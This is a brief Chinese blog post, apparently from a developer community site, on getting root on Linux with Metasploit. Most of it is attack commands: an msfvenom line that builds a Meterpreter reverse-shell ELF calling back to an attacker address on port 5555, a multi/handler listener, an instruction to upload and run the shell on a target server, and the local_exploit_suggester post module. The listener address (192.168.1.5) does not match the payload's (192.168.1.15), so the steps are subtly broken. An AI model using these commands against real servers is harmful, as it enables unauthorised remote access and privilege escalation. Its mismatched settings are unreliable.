0
点赞
收藏
分享

微信扫一扫

metasploit linux 提权

夏木之下 2022-04-14 阅读 78

1、简介
Metasploit是一款开源的安全漏洞检测工具,可以帮助`安全和IT专业人士识别安全性问题,验证漏洞的
缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代
码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

生成shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.15  LPORT=5555  -f elf > shell.elf

监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 192.168.1.5
set lport 5555
exploit

将shell上传到目标服务器并访问就会获取session
使用模块查询漏洞
run post/multi/recon/local_exploit_suggester
使用模块提权如果成功会有session会话返回

举报

相关推荐

0 条评论